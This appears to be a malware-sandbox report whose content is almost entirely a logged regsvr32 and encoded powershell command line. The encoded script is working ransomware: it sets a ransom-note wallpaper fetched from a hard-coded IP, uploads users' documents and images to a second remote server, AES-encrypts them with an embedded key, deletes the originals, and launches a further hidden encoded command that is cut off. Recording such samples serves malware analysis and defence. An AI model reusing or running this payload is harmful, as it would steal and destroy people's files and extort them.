Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Sept. 14, 2021, 3:35 p.m. | Sept. 14, 2021, 3:37 p.m. |
-
regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Users\test22\AppData\Local\Temp\admin.php.dll
2500-
powershell.exe powershell -Enc ZgB1AG4AYwB0AGkAbwBuACAAUwBlAHQALQBXAGEAbABsAFAAYQBwAGUAcgAgAHsAIAAgACAADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAewBUAHIAYABVAEUAfQApAF0ADQAKACAAIAAgACAAIAAgACAAIAAjACAAUAByAG8AdgBpAGQAZQAgAHAAYQB0AGgAIAB0AG8AIABpAG0AYQBnAGUADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJAB7AEkAYABNAGAAQQBnAEUAfQAsAA0ACgAgACAAIAAgACAAIAAgACAAIwAgAFAAcgBvAHYAaQBkAGUAIAB3AGEAbABsAHAAYQBwAGUAcgAgAHMAdAB5AGwAZQAgAHQAaABhAHQAIAB5AG8AdQAgAHcAbwB1AGwAZAAgAGwAaQBrAGUAIABhAHAAcABsAGkAZQBkAA0ACgAgACAAIAAgACAAIAAgACAAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB7AEYAYABBAGAAbABTAGUAfQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAFYAYQBsAGkAZABhAHQAZQBTAGUAdAAoACgAJwBGACcAKwAnAGkAbABsACcAKQAsACAAKAAnAEYAJwArACcAaQB0ACcAKQAsACAAKAAnAFMAJwArACcAdAByAGUAJwArACcAdABjAGgAJwApACwAIAAoACcAVABpACcAKwAnAGwAZQAnACkALAAgACgAJwBDAGUAbgB0AGUAJwArACcAcgAnACkALAAgACgAJwBTAHAAYQAnACsAJwBuACcAKQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJAB7AFMAYABUAHkAbABlAH0ADQAKACAAIAAgACAAKQANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgACQAewBXAGAAQQBgAEwATABwAGEAUABFAHIAYABzAFQAWQBMAGUAfQAgAD0AIABTAHcAaQB0AGMAaAAgACgAJAB7AHMAVAB5AGAAbABlAH0AKQAgAHsADQAKACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAKAAnAEYAaQBsACcAKwAnAGwAJwApACAAewAnADEAMAAnAH0ADQAKACAAIAAgACAAIAAgACAAIAAoACcARgBpACcAKwAnAHQAJwApACAAewAiADYAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAFMAdAByAGUAdAAnACsAJwBjAGgAJwApACAAewAiADIAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAFQAaQAnACsAJwBsAGUAJwApACAAewAiADAAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAEMAJwArACcAZQBuAHQAZQByACcAKQAgAHsAIgAwACIAfQANAAoAIAAgACAAIAAgACAAIAAgACgAJwBTAHAAYQAnACsAJwBuACcAKQAgAHsAJwAyADIAJwB9AA0ACgAgACAAIAAgACAAIAANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACAADQAKACAAIAAgACAASQBmACgAJAB7AHMAVABgAFkAbABFAH0AIAAtAGUAcQAgACgAJwBUAGkAJwArACcAbABlACcAKQApACAAewANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAbgBFAGAAdwAtAGAAaQBUAGUAbQBgAHAAUgBPAFAAZQByAFQAeQAgAC0AUABhAHQAaAAgACgAKAAnAEgASwBDAFUAOgBrAHkANQBDACcAKwAnAG8AbgB0AHIAJwArACcAbwBsACcAKwAnACAAUAAnACsAJwBhAG4AZQBsAGsAJwArACcAeQA1AEQAZQBzAGsAdABvACcAKwAnAHAAJwApACAAIAAtAFIAZQBwAGwAQQBjAEUAJwBrAHkANQAnACwAWwBjAGgAYQByAF0AOQAyACkAIAAtAE4AYQBtAGUAIABXAGEAbABsAHAAYQBwAGUAcgBTAHQAeQBsAGUAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACQAewBXAGEAbABgAGwAcABBAFAAZQByAHMAVAB5AGAATABlAH0AIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAE4ARQBgAHcALQBJAFQARQBtAHAAUgBgAG8AYABQAGAARQByAFQAeQAgAC0AUABhAHQAaAAgACgAKAAnAEgASwAnACsAJwBDAFUAOgBsAGgAJwArACcAeABDAG8AbgB0AHIAbwBsACcAKwAnACAAJwArACcAUABhAG4AZQBsAGwAaAB4AEQAZQBzAGsAdABvAHAAJwApAC4AcgBFAHAAbABhAEMAZQAoACgAWwBjAEgAQQBSAF0AMQAwADgAKwBbAGMASABBAFIAXQAxADAANAArAFsAYwBIAEEAUgBdADEAMgAwACkALAAnAFwAJwApACkAIAAtAE4AYQBtAGUAIABUAGkAbABlAFcAYQBsAGwAcABhAHAAZQByACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUADQAKACAAIAAgACAAIAANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAEUAbABzAGUAIAB7AA0ACgAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABOAGAAZQBXAC0AaQBUAEUATQBwAGAAUgBPAGAAcABFAHIAYABUAHkAIAAtAFAAYQB0AGgAIAAoACgAJwBIAEsAQwBVADoAJwArACcAagBUAGYAQwBvAG4AJwArACcAdAAnACsAJwByAG8AbAAgAFAAJwArACcAYQBuACcAKwAnAGUAJwArACcAbABqAFQAZgAnACsAJwBEAGUAcwBrAHQAbwBwACcAKQAtAFIARQBwAEwAYQBDAEUAKABbAGMASABhAFIAXQAxADAANgArAFsAYwBIAGEAUgBdADgANAArAFsAYwBIAGEAUgBdADEAMAAyACkALABbAGMASABhAFIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgAFcAYQBsAGwAcABhAHAAZQByAFMAdAB5AGwAZQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAJAB7AHcAYQBsAEwAUABhAGAAcABFAFIAUwB0AGAAeQBgAGwAZQB9ACAALQBGAG8AcgBjAGUADQAKACAAIAAgACAAIAAgACAAIABuAGAAZQBXAC0AaQBUAGUAbQBgAHAAcgBgAE8AcABFAFIAdABZACAALQBQAGEAdABoACAAKAAoACcASABLAEMAJwArACcAVQA6ADYAVwBVAEMAbwBuAHQAcgBvAGwAIABQAGEAbgBlAGwANgAnACsAJwBXAFUARAAnACsAJwBlACcAKwAnAHMAawAnACsAJwB0AG8AcAAnACkAIAAtAEMAcgBFAHAAbABBAEMAZQAnADYAVwBVACcALABbAGMASABBAFIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgAFQAaQBsAGUAVwBhAGwAbABwAGEAcABlAHIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAB7AFQAYABlAE0AUAB9ACAAPQANAAoAQAAiACAADQAKACAAIAAgACAAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAgAA0ACgAgACAAIAAgAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKACAAIAAgACAAIAAgAA0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAAUABhAHIAYQBtAHMADQAKACAAIAAgACAAewAgAA0ACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBzAGUAcgAzADIALgBkAGwAbAAiACwAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBVAG4AaQBjAG8AZABlACkAXQAgAA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABTAHkAcwB0AGUAbQBQAGEAcgBhAG0AZQB0AGUAcgBzAEkAbgBmAG8AIAAoAEkAbgB0ADMAMgAgAHUAQQBjAHQAaQBvAG4ALAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB0ADMAMgAgAHUAUABhAHIAYQBtACwAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAcgBpAG4AZwAgAGwAcAB2AFAAYQByAGEAbQAsACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAMwAyACAAZgB1AFcAaQBuAEkAbgBpACkAOwANAAoAIAAgACAAIAB9AA0ACgAiAEAAIAANAAoAIAAgACAAIABBAGAARABkAGAALQB0AFkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHsAdABgAEUAbQBQAH0ADQAKAA0ACgAgACAAIAAgACQAewBzAHAAaQBfAHMAYABlAGAAVABkAGAARQBzAEsAVwBhAGAAbABsAFAAYQBQAEUAUgB9ACAAPQAgADAAeAAwADAAMQA0AA0ACgAgACAAIAAgACQAewB1AHAAZABgAEEAVABFAGAASQBOAEkAZgBgAGkAbABFAH0AIAA9ACAAMAB4ADAAMQANAAoAIAAgACAAIAAkAHsAcwBlAGAATgBEAGMASABhAGAATgBHAGUARQB2AGAAZQBgAE4AVAB9ACAAPQAgADAAeAAwADIADQAKACAAIAAgACAADQAKACAAIAAgACAAJAB7AGYAdwBgAGkATgBJAGAATgBJAH0AIAA9ACAAJAB7AFUAUABkAGEAYABUAEUAaQBgAE4AYABJAGYASQBsAGUAfQAgAC0AYgBvAHIAIAAkAHsAcwBlAGAATgBEAEMAYABIAEEATgBnAGUAZQB2AGAAZQBgAE4AdAB9AA0ACgAgACAAIAAgAA0ACgAgACAAIAAgACQAewByAGAARQBUAH0AIAA9ACAAWwBQAGEAcgBhAG0AcwBdADoAOgBTAHkAcwB0AGUAbQBQAGEAcgBhAG0AZQB0AGUAcgBzAEkAbgBmAG8AKAAkAHsAcwBwAGAAaQBfAHMAZQBgAFQAYABkAGAAZQBTAGsAdwBhAEwATABgAHAAYQBwAGAARQByAH0ALAAgADAALAAgACQAewBpAG0AQQBgAGcAZQB9ACwAIAAkAHsARgBXAGAAaQBgAE4AaQBOAGkAfQApAA0ACgB9AA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgB2AG8AawBlAC0ARQBuAGMAcgB5AGMAcgB5ACAAewANAAoAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ADQAKACAAIAAgACAAWwBPAHUAdABwAHUAdABUAHkAcABlACgAWwBzAHQAcgBpAG4AZwBdACkAXQANAAoAIAAgACAAIABQAGEAcgBhAG0ADQAKACAAIAAgACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAgAD0AIAAkAHsAdABSAGAAVQBFAH0AKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAewBrAGAARQB5AH0ALAANAAoADQAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAIAA9ACAAJAB7AFQAUgBgAFUARQB9ACwAIABQAGEAcgBhAG0AZQB0AGUAcgBTAGUAdABOAGEAbQBlACAAPQAgACIAYwBSAFkAcABgAFQAZgBJAGAATABlACIAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAewBQAGAAQQBUAEgAfQANAAoAIAAgACAAIAApADsADQAKAA0ACgAgACAAIAAgAEIAZQBnAGkAbgAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAcwBgAGgAYABBAGAAbQBBAG4AYQBHAEUARAB9ACAAPQAgAG4ARQBXAC0AbwBgAEIAagBgAGUAQwBUACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFMASABBADIANQA2AE0AYQBuAGEAZwBlAGQAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBhAEUAUwBgAE0AQQBuAEEARwBgAEUARAB9ACAAPQAgAG4AZQBXAGAALQBvAGAAQgBKAEUAQwBUACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBhAEUAcwBNAEEAbgBgAEEAZwBgAGUAZAB9AC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDADsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAYQBFAFMAbQBBAG4AYQBgAEcAYABlAEQAfQAuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFoAZQByAG8AcwA7AA0ACgAgACAAIAAgACAAIAAgACAAJAB7AEEAZQBgAHMAbQBgAEEAYABOAGEAZwBFAGQAfQAuAEIAbABvAGMAawBTAGkAegBlACAAPQAgADEAMgA4ADsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAQQBFAFMAYABNAEEAYABOAEEARwBlAEQAfQAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMgA1ADYAOwANAAoAIAAgACAAIAB9AA0ACgANAAoAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAewBhAGUAcwBgAE0AQQBOAGAAQQBHAGAAZQBEAH0ALgBLAGUAeQAgAD0AIAAkAHsAcwBoAGEATQBgAEEAbgBgAEEAYABHAEUARAB9AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAewBrAGAAZQBZAH0AKQApADsADQAKACAAIAAgACAAIAAgACAAIAB0AHIAeQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAewBmAGAAaQBMAGUAfQAgAD0AIABnAEUAdAAtAGAASQBgAFQARQBNACAALQBQAGEAdABoACAAJAB7AHAAYQBgAFQAaAB9ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAUABMAGEAaQBgAE4AQgBgAHkAYABUAGUAUwB9ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJAB7AEYASQBgAGwAZQB9AC4ARgB1AGwAbABOAGEAbQBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AG8AdQBgAFQAUABgAEEAVABoAH0AIAA9ACAAJAB7AGYASQBgAEwAZQB9AC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACgAJwAuAGUAJwArACcAbgBjAHIAeQBjAHIAeQAnACkAOwANAAoAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AGUAbgBjAHIAYAB5AFAAdABgAG8AcgB9ACAAPQAgACQAewBBAEUAcwBgAE0AQQBuAEEAYABHAEUAZAB9AC4AQwByAGUAYQB0AGUARQBuAGMAcgB5AHAAdABvAHIAKAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAewBlAG4AYABjAFIAWQBwAFQARQBgAGQAQgBgAFkAVABlAFMAfQAgAD0AIAAkAHsAZQBuAEMAcgB5AGAAcABgAFQAbwByAH0ALgBUAHIAYQBuAHMAZgBvAHIAbQBGAGkAbgBhAGwAQgBsAG8AYwBrACgAJAB7AFAAYABsAEEASQBOAGIAYAB5AFQAZQBzAH0ALAAgADAALAAgACQAewBQAGAAbABgAEEAaQBuAGIAWQB0AEUAUwB9AC4ATABlAG4AZwB0AGgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAZQBOAGAAQwBgAFIAWQBgAFAAdABlAGAARABCAHkAdABFAHMAfQAgAD0AIAAkAHsAQQBFAHMAbQBhAG4AYABBAGAARwBgAGUARAB9AC4ASQBWACAAKwAgACQAewBFAGAATgBDAFIAYABZAFAAdABlAGQAYABCAFkAdABlAHMAfQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAYQBlAGAAUwBgAG0AQQBOAGAAQQBHAEUARAB9AC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAewBvAFUAVABgAFAAYQBgAFQASAB9ACwAIAAkAHsAZQBuAGAAQwBSAFkAUABUAGUAZABCAGAAeQBUAEUAcwB9ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKABnAGAARQBgAFQALQBJAHQARQBtACAAJAB7AG8AVQB0AGAAcABhAHQAaAB9ACkALgBMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAAPQAgACQAewBGAGkAYABsAGUAfQAuAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoACcARgAnACsAJwBpAGwAZQAgACcAKwAnAGUAJwArACcAbgBjACcAKwAnAHIAeQBwAHQAZQBkACcAKwAnACAAJwArACcAdABvACcAKwAnACAAJwArACIAJABvAHUAdABQAGEAdABoACIAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAfQAgAEMAYQB0AGMAaAAgAHsAIAB9AA0ACgAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgAA0ACgAgACAAIAAgAEUAbgBkACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAewBTAEgAQQBgAG0AYQBuAGEAZwBgAEUAZAB9AC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBBAGAARQBzAE0AYQBOAGAAQQBnAEUARAB9AC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJAB7AGQAbwBgAFcAbgBgAEwAbwBhAGAARABVAHIATAB9ACAAPQAgACgAJwBoACcAKwAnAHQAdAAnACsAJwBwADoALwAvADEANgAnACsAJwA4AC4AMQAnACsAJwA4ACcAKwAnADgALgAxADIANwAnACsAJwAuADIAJwArACcAMQA3ACcAKwAnAC8AbgBvACcAKwAnAHQAaQBjAGUALgBwAG4AZwAnACkADQAKACQAewBQAEEAYABUAGgAfQAgAD0AIAAoACQAewBFAE4AdgA6AGAAVABlAGAATQBwAH0AKQAgACsAIAAoACgAJwAzAEQAQgBuAG8AJwArACcAdABpAGMAZQAuACcAKwAnAHAAJwArACcAbgBnACcAKQAuAHIARQBQAEwAYQBDAGUAKAAoAFsAYwBIAEEAUgBdADUAMQArAFsAYwBIAEEAUgBdADYAOAArAFsAYwBIAEEAUgBdADYANgApACwAWwBTAFQAUgBpAG4ARwBdAFsAYwBIAEEAUgBdADkAMgApACkADQAKACgAbgBlAFcALQBvAGAAQgBqAEUAYABDAFQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB7AEQATwBXAGAATgBMAG8AQQBkAGAAVQByAEwAfQAsACAAJAB7AFAAQQBgAFQAaAB9ACkADQAKAA0ACgBTAEUAVABgAC0AdwBhAGAAbABgAEwAUABBAHAAYABlAFIAIAAtAEkAbQBhAGcAZQAgACQAZQBuAHYAOgBUAEUATQBQACIAXABuAG8AdABpAGMAZQAuAHAAbgBnACIAIAAtAFMAdAB5AGwAZQAgAEYAaQB0AA0ACgANAAoAdwBoAGkAbABlACgAMQApACAAewANAAoAIAAgACAAIAAkAHsAQQB9ACAAPQAgAEcAZQBUAC0AYwBoAGkAbABgAGQAYABpAGAAVABlAE0AIAAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAC8AKgAgAC0ASQBuAGMAbAB1AGQAZQAgACoALgBwAG4AZwAsACAAKgAuAGcAaQBmACwAIAAqAC4AagBwAGcALAAgACoALgBqAHAAZQBnACwAIAAqAC4AYQBpACwAIAAqAC4AcABzAGQALAAgACoALgBjAHMAdgAsACAAKgAuAHgAbABzAHgALAAgACoALgBwAHAAdAB4ACwAIAAqAC4AcABkAGYALAAgACoALgBoAHcAcAAsACAAKgAuAGgAdwBwAHgALAAgACoALgB0AHgAdAAsACAAKgAuAGIAYQB0ACwAIAAqAC4AbABuAGsALAAgACoALgB6AGkAcAAsACAAKgAuADcAegAsACAAKgAuAHIAYQByACwAIAAqAC4AdAB4AHQAIAAtAFIAZQBjAHUAcgBzAGUAOwANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHsAQgB9ACAAaQBuACAAJAB7AEEAfQApACAAewANAAoAIAAgACAAIAAgACAAIAAgAFQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AFcAYwB9ACAAPQAgAE4AZQBgAFcALQBvAGAAQgBKAGAARQBDAFQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AHIAYABlAFMAfQAgAD0AIAAkAHsAVwBDAH0ALgBVAHAAbABvAGEAZABGAGkAbABlACgAKAAnAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AMwA0ACcAKwAnAC4ANgAnACsAJwA0AC4AJwArACcAMQA0ADMALgAzADQAOgAnACsAJwAzADAAMAAwACcAKQAsACAAJAB7AEIAfQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAYABOAGAAVgBgAE8ASwBlAGAALQBFAG4AYwByAHkAYwBSAHkAIAAtAEsAZQB5ACAAKAAnADkANgA0ADEARQA0ACcAKwAnADQAJwArACcAMAAzADUAQwAwADgAQQAxADQAJwArACcAMgAyACcAKwAnADYAOABGAEIAJwArACcARQA1AEEAQgAzADMARAAwAEQARgAnACkAIAAtAFAAYQB0AGgAIAAkAHsAQgB9ADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIARQBNAG8AVgBgAEUALQBJAGAAVABlAE0AIAAkAHsAYgB9ADsADQAKACAAIAAgACAAIAAgACAAIAB9ACAAQwBhAHQAYwBoACAAewAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABTAFQAYQBgAFIAVABgAC0AUABgAFIAbwBjAEUAcwBzACAAJABQAFMASABPAE0ARQBcAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAoACcALQAnACsAJwBOAG8ARQB4AGkAdAAnACkALAAoACcALQB3AGkAbgBkAG8AJwArACcAdwBzAHQAeQBsAGUAJwArACcAIABoAGkAJwArACcAZAAnACsAJwBkACcAKwAnAGUAbgAnACkALAAoACcALQBFAG4AYwAgAEoAQQBCADAAQQBDACcAKwAnAEEAQQBQAFEAQQBnAEEAQwBjAEEAVwB3AEIARQBBAEcAdwBBAGIAQQBCAEoAQQBHADAAQQBjAEEAQgB2AEEASABJACcAKwAnAEEAZABBAEEAbwBBAEMASQBBAGQAUQBCAHoAJwArACcAQQBHAFUAQQBjAGcAQQB6AEEARABJAEEATABnAEIAawBBAEcAdwBBAGIAQQBBAGkAQQBDAGsAQQBYAFEAQQBnAEEASABBAEEAZABRAEIAaQBBAEcAdwBBAGEAUQBCAGoAQQBDAEEAQQBjAHcAQgAwAEEARwBFAEEAZABBAEIAcABBAEcATQBBAEkAQQBCAGwAQQBIAGcAQQBkAEEAQgBsAEEASABJAEEAYgAnACsAJwBnAEEAZwBBAEcASQBBAGIAdwBCAHYAQQBHAHcAQQBJAEEAQgBUAEEARwBnAEEAYgB3AEIAMwBBAEYAYwBBAGEAUQBCAHUAQQBHAFEAQQBiAHcAQgAzAEEAQwBnAEEAYQBRAEIAdQBBAEgAUQBBAEkAQQBCAG8AQQBHACcAKwAnAEUAQQBiAGcAQgBrAEEARwAnACsAJwB3AEEAWgBRAEEAcwBBAEMAQQBBAGEAUQBCAHUAQQBIAFEAQQBJAEEAQgB6AEEASABRAEEAWQBRAEIAMABBAEcAVQBBAEsAUQBBADcAJwArACcAQQBDAGMAQQBEAFEAQQBLAEEARwBFAEEAWgBBAEIAawBBAEMAMABBAGQAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAYgBnAEIAaABBAEcAMAAnACsAJwBBAFoAUQBBAGcAQQBIAGMAQQBhAFEAQgB1AEEAQwBBAEEATABRAEIAdABBAEcAVQBBAGIAUQBCAGkAQQBHAFUAQQBjAGcAQQBnAEEAQwBRAEEAZABBAEEAZwBBAEMAMABBAGIAZwBCAGgAQQBHADAAQQBaAFEAQgB6AEEASABBAEEAJwArACcAWQBRAEIAagBBAEcAVQBBAEkAQQAnACsAJwBCAHUAQQBHAEUAQQBkAEEAQgBwAEEASABZAEEAWgBRAEEATgBBAEEAbwBBAFcAdwBCAHUAQQBHAEUAQQBkAEEAQgBwAEEASABZAEEAWgBRAEEAdQBBAEgAYwBBAGEAUQBCAHUAQQBGADAAQQAnACsAJwBPAGcAQQA2AEEARgBNAEEAYQBBAEIAdgBBAEgAYwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEASwBBAEEAbwBBAEYAcwBBAFUAdwBCADUAQQBIAE0AQQBkAEEAQgBsAEEARwAwAEEATABnAEIARQBBAEcAawBBAFkAUQBCAG4AQQAnACsAJwBHADQAQQBiAHcAQgB6AEEASABRACcAKwAnAEEAYQBRAEIAagBBAEgATQBBAEwAZwBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEYAMABBAE8AZwBBADYAQQBFAGMAQQBaAFEAQgAwAEEARQBNAEEAZABRAEIAeQBBAEgASQBBAFoAUQBCAHUAQQBIAFEAQQBVAEEAQgB5AEEARwA4AEEAWQB3AEIAbABBAEgATQBBAGMAdwBBAG8AQQBDAGsAQQBJAEEAQgA4AEEAQwBBAEEAUgB3AEIAbABBAEgAUQBBAEwAUQBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEMAawBBAEwAZwBCAE4AQQBHAEUAJwArACcAQQBhAFEAQgB1AEEARgBjAEEAYQBRAEIAdQBBAEcAUQBBAGIAdwAnACsAJwBCADMAQQBFAGcAQQBZAFEAQgB1AEEARwBRAEEAYgBBAEIAbABBAEMAdwBBAEkAQQBBAHcAQQBDAGsAQQBEAFEAQQBLAEEAQQAwAEEAQwBnAEEAawBBAEcATQBBAGIAQQBCAHAAQQBHAFUAQQBiAGcAQgAnACsAJwAwAEEAQwBBAEEAUABRAEEAZwBBAEUANABBAFoAUQBCADMAQQAnACsAJwBDADAAQQAnACsAJwBUAHcAQgBpAEEARwBvAEEAWgBRAEIAagBBAEgAUQBBAEkAJwArACcAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUANABBAFoAUQBCADAAQQBDADQAQQBVAHcAQgB2AEEARwBNAEEAYQB3AEIAJwArACcAbABBAEgAUQBBAGMAdwBBAHUAQQBGAFEAQQBRAHcAQgAnACsAJwBRAEEARQBNAEEAYgBBAEIAcABBAEcAVQBBAGIAZwBCADAAQQBDAGcAQQAnACsAJwBJAGcAQQB6AEEARABRAEEATABnAEEAeABBACcAKwA